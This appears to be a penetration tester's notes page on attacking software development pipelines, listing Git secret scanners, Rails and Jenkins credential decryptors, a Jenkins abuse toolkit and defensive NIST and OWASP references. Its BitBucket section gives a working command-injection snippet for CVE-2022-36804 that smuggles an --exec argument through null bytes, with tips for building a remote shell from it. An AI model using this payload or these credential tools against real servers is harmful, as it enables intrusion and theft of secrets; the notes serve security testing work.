SDLC

Anything to can be used to attack SDLC processes.

Git

• trufflehog
  • Scour commit history for credentials
  • WARNING: The rewrite did away with entropy checks - just use v2 (install with pip install truffleHog)
• gitleaks
  • SAST tool to detect/prevent credential leakage
• SCMKit
  • Source Code Managerment Attack Toolkitz

Framework-Specific Secrets Extraction

• Ruby on Rails
  • Credentials.yml.enc_Decryptor
  • Expose & Decrypt Ruby on Rails credentials.yml.enc
• Blacklist3r
  • Accumulate secret keys/secret materials (read: pre-published keys) used by devs blindly copy/pasting code
  • Article here

Jenkins

• pwn_jenkins
  • Toolkit for abusing Jenkins
  • Take note of jenkins_password_spraying.py
• jenkins-credentials-decryptor
  • Standalone binary for decrypting Jenkins credentials
  • WARNING: This may require a patch since valid checksums don't necessarily register as such
• Week of Continuous Intrusion Tools - Day 1 - Jenkins
  • TODO: There may be more interesting stuff in this series

BitBucket

• CVE-2022-36804
  • Decent writeup here
  • Sample code below. Pretty easy to write a faux "shell" from there.
    • Do note that this truncates output to a single line of text. Just replace newlines with a unique string, whitespace with another, and then translate back after getting the response.
    • Don't forget to:
      • Redirect stderr
      • Error out on shell commands like clear, alias, etc.
      • Expand more common aliases like ll

url = f"{bitbucket_url}/rest/api/latest/projects/{project}/archive"
params = {
  "filename": "whatever",
  "path": "whatever",
  "prefix": "ax" + "\0" + f"--exec=`{command}`" + "\0" + "--remote=origin"
}

Resources

• Script Execution and Privilege Escalation on Jenkins Server
  • NOTE: endpoint for auth is /j_acegi_security_check (prepend /jenkins?)
• Jenkins Security Advisories
  • So many vulns if plugins aren't kept up to date...
• NIST Secure Software Development Framework
  • General guidelines for securing the pipeline
• NIST Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations
• OWASP Software Assurance Maturity Model (SAMM)
• How we Abused Repository Webhooks to Access Internal CI Systems at Scale